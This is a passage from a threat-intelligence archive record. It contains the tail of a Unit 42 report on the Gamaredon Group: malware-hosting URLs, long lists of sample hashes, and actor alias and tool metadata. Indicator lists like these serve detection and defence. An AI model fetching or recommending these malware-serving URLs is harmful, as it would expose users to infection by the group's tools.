u\r\nyfperoliz.webhop[.]me\r\nURLs:\r\nhttp://childrights.in[.]ua/public/manager/img/scrdll.ini\r\nhttp://prestigeclub.frantov[.]com.ua/press-center/press/chrome-xvnc-v5517.exe\r\nhttp://umachka[.]ua/screen/dk.tmp\r\nhttp://umachka[.]ua/screen/screen.tmp\r\nhttp://viberload.ddns[.]net/viber.nls\r\nHashes:\r\nSamples using custom developed tools:\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 13 of 17\n\n002aff376ec452ec35ae2930dfbb51bd40229c258611d19b86863c3b0d156705\r\n08e69f21c3c60a4a9b78f580c3a55d4cfb74729705b5b7d01c1aecfd58fc49e6\r\n0c47cf984afe87a14d0d4c94557864ed19b4cb52783e49ce96ebf9c2f8b52d27\r\n0dc1010c3d3766158e2347d10fc78d9223c6e0e3a44aa8a76622aeff7d429ab9\r\n0f745512940e0efd8f09c6d862571cba2b98fac9a9f7cf30dedcc08ace43a494\r\n145dab86a43835bb37734c16756d6d64d8e5ac6b87c491c57385e27b564136b8\r\n222e85e6d07bdc3a2141cdd582d3f2ed4b1ce5285731cc3f54e6202a13737f8d\r\n2f2b26f2f7d164ea1f529edbc3cb8a1063b39121dad4dd19d8ee4bbbaf25ed37\r\n3242183b1f0176a2e3cfb6bfef96b9d55c5a59ea9614dbde4ef89979336b5a5d\r\n3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9\r\n37c78ee7826d63bb9219de594ed6693f18da5db60e3cbc86795bd10b296f12ac\r\n3e5b1116b2dfd99652a001968a05fc962974931a0596153ab0dea8e4a9982f89\r\n400f53a89d08d47f608e1288d9873bf8d421fc7cd642c5e821674f38e07a1501\r\n598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824\r\n5b22ace98b57ed19d815c49983c96a3c6ff0b2701e8167d4422c6990982abcf9\r\n5ec8b7ca4461720bd69fb49b3f6cae637d8ac3bbd675da938bc5a84e9b73b395\r\n840b3d4cc95dbf311f792a9f50137056deb66bfdbb55eb9f54ff381a0df65656\r\n90ba0f95896736b799f8651ef0600d4fa85c6c3e056e54eab5bb216327912edd\r\n97ebd7bfad63b36b4572132f6ece359ff9991f269048c0b145411699bfe3dc34\r\n9a1fd88970da3809f45cef00360d1e54ea11a70035c277c130404a67371e142d\r\n9cb64d3242d2b591bd2ff13b1aadef2e6b4bf9147f4a0926613b7c9343feb312\r\na46508ec9e48c256261b2d1914532a36ac7da093253320135d77581051751b75\r\na7e27ff0695a4bdf58c584f48664acd3a385ccebf3a542fdd6d7383f414aa83a\r\na804beddd22bb76ea207a9607ed5c888f2f640cbd9ed9a32942fcd0b8a25c4d5\r\nae5ab2e887a9b46ea7819b7ebbb8163028e66882c97e75b0698dc3a69a69d7da\r\nb2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875\r\nb9434e5a14159c49af2d1a5a11d570f195797d6b17aa560c3dde4a5b3486bf2a\r\nbe2be662cc821a924d5641422dd1116e99188c6923da092ca3f0f8f862bd2d2d\r\nd01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726\r\nd1ba365e93ff0a4f3a2cb1d657568e583e3fbd7dbb1c2c52e28f16480324e3bb\r\nddfc6bb4819527b2424d6e1a84f04b67adad79401e39efbffba5b7d727e732f0\r\ndf434f54802a6814628f30cae335c302bae7085c4e8314d71a41a47d9c410c39\r\ne24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4\r\nf2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126 \r\nSamples using bundled commodity tools:\r\n026be8a873560f1496c6961f6e36c312bdda01beacb17c4b744f35ee1923d061\r\n03c943f5cba11b09b9c3afa0705d4a027e5a9d81b299711740cc5aedfe4b4aa1\r\n03e5e99cc8280de4663c4b65bfd26782d4975258808a63a4b20bc068008df7f5\r\n059e40ba91b2b2d827c200476fcbd0fad0d43ab198d0c206c996777d27e6de65\r\n0669e61e51cf43daa431d52b5461c90bdce1b1bee03b087e4406c30264dcb9a4\r\n068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa\r\n0b4a90b823a581311c4acb59f35e32f81f70ca16a2538f54f4dbe03db93350df\r\n0b5316d723d1ebbec9aba0c9ff6761050305d644c3eeb5291b4e2c4de9e5fa15\r\n0b8d59312699739b6e6cb7aeb0f22a2eaebbb0fd898a97ef9b83e8d8e9ce67a0\r\n0dd13d2d0edbcf9d1825c2bfc165876ada2e4d04e2981a0003cb6503fad2287b\r\n0ddb7867e31f3f30cd1cfe74393f8ac5bbdc61538278de9219a49345f0d3af7f\r\n13fed3accac4f38f28e606b110a3b7924d9c7a1a911f8c0613d0bb791e715267\r\n151cf4c83722ba171ae42640e5e13af67ca06ee0a06a74afa53931acf6ac1506\r\n17006d77cc1459aa3d70e4e9377edb2547a7446647aa9872c9dd9ad860ed7e39\r\n1ec7e595677038145991c6d84dc7808602142f258c1f90e9486cca0fe531d74f\r\n208dc592111a8221a9c633efc120b890585f9a67ed340cbb5ec9db4cd5e164e4\r\n2124adbee89f2c1cb65896bed26e7ffa8bf0fcbdfeb99a9e751fea9cca7a896b\r\n22e97292671ada8deef4329eb115c52f6f1bc598bcf01a3961f1c35a2230a013\r\n259a78122ef51ae503059143bf36941fc6090be83213d196ba3051ba36a0b2a1\r\n26564c23530dd14e0042e074f4178a5b2ad6fc8f51f10138fc39941a6303bff9\r\n29453fa1772b6d7d33842d6abbe0cb55c4a4b66a00f43284c8724d7c16749a7d\r\n2a072d9ce63a94d2530cf9f18a232c6a09f6c7bdff9dbe27faceef53604145ea\r\n2c02d3d3fadd76f9d21f5c093459ddc0045c94f17679269eb7a2990a1a88cb42\r\n2d55000bb5cb9e3e1f137810c2e1eb899f68c40e4a6f6307f226c7b8af208abd\r\n2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20\r\n2e89436b355550ceb361fac1b03b78b71eda11d25f26223ac5c8c34ed8972a05\r\n32b0e6394b110860371da5541946a6dcc85358a3951eddc86fdaf5794527c150\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 14 of 17\n\n33934fcfae5760316b3f40e013cbb03d8086f8c30f9a4ba9bed3f9486a530796\r\n34d86602882e86f8aaaeb7513126c8579a4489f2be31c279188e2f2ca8a0e141\r\n390162dae62a0347e35cf5dad093cfc2f7d4ded62fba9d2df7af6133feb41ee0\r\n3ef8602579c6b145fbaafc8970b4c9a6e7bebd11eb5e37eecaa67b4572c6038b\r\n420acd7e8598fe994b59bf5d30f89e1c11b36cbef464a4786694cf9eada8dd4c\r\n42b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988\r\n42eed03907c9dfa0e566fbe5968cdb5a1b7b5e18521f7327185ed2208c6c29b4\r\n46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d\r\n47d929c69bfd8d8efb9c280eabec2f73d4bddf1c3c30120c3fb6334623469888\r\n505ef8cbc1271ce32f0c473468d75a1aba5073c37b2e6b49293ddc9efcb4ac96\r\n5230453eeb98c5a183129ed8b918b429e96020887302ba30941c408108a1ab84\r\n5363220b532d7da378b338e839a501ae5c006cc03c8b2d3627c480d64deb1221\r\n558f33d478091993e5b5921604f8c3873efc87f551fddf61612b5c64d5b610f6\r\n55c76f4f93f9e155fbb6a28447f97c1ccda0081061dc3cb9973d42c1686964b7\r\n56c8246819f7de5cba91001793831441d4ce998ccb8237cb96c9f52e88ea384b\r\n59bddb5ccdc1c37c838c8a3d96a865a28c75b5807415fd931eaff0af931d1820\r\n5ac627f8964d3b9cad69f21e3b8f27305f1f68f49e4f4fae2c73949a04b32692\r\n5ccc76ae1cdf668ba7f89c6cbd0bad44f148cbee736320ead237262ba170ffba\r\n5cd4401c1dae9b9ecd75c96ab29dc64ce40bef3acc6faf7c001ff98ebd3b3413\r\n5cd72eaf555813f1ee187def594584f5cfc6a5e83086f35e281327b5210adffb\r\n5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e\r\n6c258151c593268c13c252d8f275192a6f7a74d5de5754f2cf20fb94be7ee6ea\r\n0458e168baa4fa5942892065925ac82b12245551b539d54c2884b3a21c2699d8\r\n877f1de209eb9d8b2a20a76f8773d12e5a1fcde4148868c7b73added392f62f6\r\n29c728a169c5d18298e77db161dd5d2f6396ceca9ee7849b63ff8a8bc11f911e\r\n98e092b7bfc3bbdaeb82e05de14ba5835c6ac626c17de9eef2049796a031dd10\r\n27e08fb90ada2fd8ce6b6149786edd3b814dd0324257ebd919ed66ada0334b21\r\n9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca\r\nf47115ea58615781e56dcac673c19edf7ce00defd7ada709ae97b0708d3eac1e\r\nb80719854f8744ba62e9f0e774c09e2e2ed79dd37f9f94ba3ed05ec8507d55e6\r\n467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49\r\n5c47d18b3f0e0274c6a66b2eab27d47c73a0105c263d41c6473aba9a28d0a4ba\r\n01c5729ac1ae3928053c085fd616323a3715863ab3d7e9b8106c09e24df34183\r\n5b6a691cf8faf238b27861941a1b667d889889cc9711a3e561403d6a6ed292c9\r\ne2688f72cc7ae836be19e765e39318873554ee194a09945eb3f3805d04f256ca\r\n9f0228e3d1577ffb2533584c2b1d87ebee0c0d490f981e61d18bb27ab02e52cb\r\n2617f9301869304b88d8a3a4f7b2eab6b0edf264cc1a28b99f5685959242ec39\r\nf3107a5a00f36e12be7cc2e37c35903ef855b8043492af374ea918385821443c\r\n63fcfab8e9b97d9aec3d6f243003ea3e2bf955523f08e6f1c0d1e28c839ee3d5\r\n05cbe01b1125897e0e982c587a10a72f4df795b844a4a2c4cec44aee7f30ce94\r\n5a7da102c11960b9651650143a4a08ae4ce97d68dff999961f1ffc792531afeb\r\ndf6112e6bad4125b80b8829c13a2ca523bb82cf303cf531389d8795e7512c7e6\r\ncfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31\r\ne79dbcc8b60da280e53d9cf818eee1de34251e0551b9947bb2b79a31b131417e\r\na73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6\r\n3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b\r\nf2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd\r\nca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc\r\n550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6\r\nf77d7940c51c2a1eab849dbd77e59c683ebf7820799ef349e7da2583e1aa11ae\r\n2c5d55619d2f56dc5824a4845334e7804d6d306daac1c23bec6f078f30f1c825\r\n7231177a115656041ba4e5b3cf0bf7a547b074f03592351484267e25cda7c899\r\nd5405f99cec0166857274b6c02a7ef52b36274fedb805a17d2089fd24ed133cf\r\n81921b6a7eba39a3f73895a57892ed3a46ab6365ac97d550ca3b9bff46c7a1c2\r\n1eef9f8d7d3099b87be7ac25121f9d2ccacfb5ccf02b508fb2036b6e059c525f\r\n5255061c3600df1a94b376fca40f3ccb69d1cb6dd42aa744b20a643c7292d20c\r\nb5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13\r\n5fb7f6f953be3b65d88bd86d1391ebc9f88fc10b0ef23541463ebf5b157f695c\r\n6016cf9898d74e2e9030be7c987964d817ba28ad2253d1da54c81a1bf49db836\r\n621e55421dffae981e3e933c65626314d5610c7c08f76f83a3d07f0ec6c36e2d\r\n6ccc24971073d24d90c4cbaf83dfbae2969cbf527e319c7ee9a4babcbe88e456\r\n6f8da9180eebe02ba35317cb8aee5c8df6ac29795af70eb9430c3588d457aad6\r\n71c5b899a5187baeb8f605ca39ca56bf05a63025a8f9f84c45590d8345e5d349\r\n725b7d92ed66be160f2e04395008a65c72814d5ddf842d9778396f6c6679d85e\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 15 of 17\n\n72d4b780a90ede7ea152f5da0973965cab31d2813fa8c2fe0e1cb611f5ca257e\r\n73670d06851f588c7df44dc478f49883406697c48c618438e0f249b7a916552e\r\n74e017853fbc85ee77ca7476cd25423815602aaaa02b29e0003c95c9551b8890\r\n75d2367dc79d9f8aed165729df90ed5d28fefe267778dbe4d3d74aafa75d66e0\r\n7a5a1c6ea0c2f017df9f06975c93a356cac20b19031fcde96136fa5881e5ef3a\r\n7adb049e0b49312aea904c70e16d0e7f03d01aae4bf8ac867e8219ced4e6e057\r\n7bfa85bec239b6c4419b2d57149c5960263c80e493f888d03ceaaa3f945b1b25\r\n7f324b658f587b3b27921ebeba5ac25aebd669b33e6801fa9581de8c2eb0df2e\r\n7fee970748eb83045e36911dafdaee0d4069ebe72c059cc7de3d65539012c2e9\r\n823793a37d748ffe708864c16c853c67a5db812712481da1d24790b455163940\r\n8512aabfa0175684bdbb77481d6b272b63dbc4249b04a44e1003b7d8fdea0a89\r\n86c81f03cf7d8f8af38c2559dbf506cccdc25579f3b29fb574f823a67f99a0a3\r\n88ae7e60b9dd57fc6b2d667ce33fb29c0f75d37eb7c837ccf56cb7994386d5ef\r\n8b50e3ca06a22d0be6a71232b320137c776f80ac3f2c81b7440b43854b8a3bf0\r\n8bd40e7fe6bbd4d5810db2c142186bb58da445a132fb6f9ff01c46947a532244\r\n8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845\r\n8d38726d674279705fe06b4b45bbbaef10756c547d560cea6998e23dba09f80c\r\n8db47439685edc683765abb5e6d7d0d05479bf9ee164992db9e8ce97fe43ee2f\r\n95de2e16f1b05d1b45b1d182c1503568c2e5fd4a81ac52fe1bc9e881d1a272b1\r\n95e3204228341852b7c97f357f799e7ec9688abe1262436b569e56397f1fd864\r\n98caf00760d772598386eb8d4f26caf92fb891915ac08da6bf830be5e45278d3\r\n99c9440a84cdc428ce140de901452eb334faec49f1f6258acdde1ddcbb34376e\r\n9a8776e4ae38cf529bab28947b31ade84301262b7996dc37ec47afa4fb4cf6e1\r\n9beb1d2a03ff2d4c15913de0f87b72074155b44df791bd967dac8155e97a0e06\r\n9c8d518fbbc8cbb25fa309f5396efa5749e57a3b0158779404c8d3e92baf6596\r\na064a28e5e7409a96bba93fc57f44cadc3492bb0f49792c89c973e30b0f5d498\r\na194b47043356fa365d98a5f7c582b6f87fac90acf0f469ed3651cfe2fd7b2c9\r\na21dfb8e8b7c8dfbeeb4d72e6ef1f22c667b8968b3a3b1dcce99f44faab05903\r\na2e0fe2d385dabcdfb024100216d259ddd1fa9907e982d297846fd29b8d4d415\r\na48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599\r\na595da9a2fa58d4f8be0bfbcf7f4c950435ff5289dd1ccf2c65eec73a0afe97f\r\na972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b\r\naa860d405746401ae4155485326fdeb39718832c77c73540d48f4fbb8e596215\r\nab6832a4432b4bdaec0706f7b00a369c48175eac9abc3e537032b1f5d26a993b\r\nada2f0703614b3447d427827777af5d4ee9ffe9179498970326926751a4f8d65\r\nb16d317c11228bd3573126a0e1bc0bbf35d84a4a1f47dfb06b70634a21fd9823\r\nb3665548cc0f2fce3593fb7139f49588faa1d327b6d23feb564ca4194053ae8a\r\nb5578c48a11533871ae91e6d5632aafc25d3976c0626d62abab306663566d024\r\nb67a6f87fc3fd7c5c3666acac5918c8c08a53ab6a966f4d1daf38105a566ede1\r\nb6abc8ab631dcf52e028ab26dbe3bb94022d69193c0acc8642cbd6329cbb23ef\r\nb7e117eb342b0d450095805073326989c792bf5ccbbdcd5f4a9ace50e517412e\r\nbb14abc9b0798c7756a6ed887308a3e6210cc08a5149dc1360fdd1f5bca27cca\r\nbdadb319f071f02462d107380102b669e407bb2a0b20e77a9a8a5726b4cbbc4b\r\nbf2383cfbee4cbb0bda2614839454ab1724c9bbfff8b4b48e0f48579ae220c10\r\nbf52b44168de1855d83186163a2d5f29e488ddafdfd5447e211aec4a769cf74a\r\nc0d5cf7a0035deda5646aaf520b3ff632aa6be76ddbc88f38ddc11e77ffb40b4\r\nc1a82a788df7418712664138c0fdb05232036a27ab0998479d60c656998849f1\r\nc63a523834ab59ab5621a0acb156a9b901befe806044642fe5fec8a0ba545e70\r\nd05d3f3582e13eaf5f39d7143ca1a4b1367cc5267bf9958a15e27cf53e059518\r\nd0e456cff03c2483ded9a0f8c1b99f9fefb6ba47dcaf949dae27abe940ee20e6\r\nd8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385\r\ndada74663e3e29ee26bfd03a888f0bda9fc81e148511fa98f73f8e8a915933cc\r\ndb3ffcbf136e0268ec66f28b30fa8ba350f74e02e8e737e61cc6ef8d8258027e\r\ndd26b85b6568595b1d2bbc47ce47d071ede75665fbd779d637b74663ead5539e\r\ndf9038660164623a827a8119d4cb3d71d0a5288b12bdfdd32c72769bf90a9ea0\r\ndfed16e9184a86e6fcd17a98f127410840d058db667e9975b43add100c33122e\r\ne0063d2524a89159cf5da12661225fbb27725bbd72acd9497b7207ecf2f3aeb6\r\ne00c55ddda9cbb82fb47924fafdf40c3394dc1127d9901c71a69ef3ef664b817\r\ne14a51d69211948163ab20b0cc68adf410bb821f2890f55d2d202c745f4ec1b8\r\ne2e3f243bbcad666852e64202d35f6dd88c58f5d24435d92975697b0efa8a775\r\ne37e25739e8bc4620d9d37d8f6b400cd82c85b89d206436ba35930ed96db6eb0\r\ne55b5ede808b6d491f18737d6a1cf34b5178f02e9ea01d7cff31a449888dbd73\r\ned28d9207acac2afff817eaa56d1599422e23946dffa4f8bade376d52a6af7d4\r\neda0853e814ee31a66c3b42af45cd66019ffd61eac30e97bd34c27d79253a1bb\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 16 of 17\n\nf1b3e58d060803b0ff6008386bab47fb8099ac75ee74f385ac34340a28bf716e\r\nf2091f71227180d74ba1ba4607635e623553b1826314dca91cb31839eb00c4ea\r\nf214d55ccb5db5edbaafe7d40b240c79f04c70d441adee01ef438f776eb37037\r\nf571ddc894915dee136cf24731ff3d79fe4f811b112d122a34a128628cb43c4a\r\nf7676d2a28992a382475af2ae0abca4794e1397ef3327f30f7d4cbdbc2ca0a68\r\nf8e20894c8c18d79e80b431008aa8bef46cc10a355a4934f9cc40ffd637b8890\r\nfa1bf7565352099b74624c8beeff6620411e1efe00e54f8b4190f69e243d5811\r\nfa784f69265ebe5e150cf5956a40d86335d1a5edc57fffcc7ce6eedc591c2751\r\nSource: http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution" ], "report_names": [ "unit-42-title-gamaredon-group-toolset-evolution" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "8bd26575-9221-47d1-9d8b-5c18354dc1bd", "created_at": "2022-10-25T16:07:24.335Z", "updated_at": "2026-04-10T02:00:04.94173Z", "deleted_at": null, "main_name": "Tortilla", "aliases": [], "source_name": "ETDA:Tortilla", "tools": [ "Babuk", "Babuk Locker", "Babyk", "CHINACHOPPER", "China Chopper", "SinoChopper", "Vasa Locker" ], "source_id": "ETDA", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434910, "ts_updated_at": 1775826695, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d870eee1c89b358082b38b2dcc4850e137ca1d83.pdf", "text": "https://archive.orkl.eu/d870eee1c89b358082b38b2dcc4850e137ca1d83.txt", "img": "https://archive.orkl.eu/d870eee1c89b358082b38b2dcc4850e137ca1d83.jpg" } }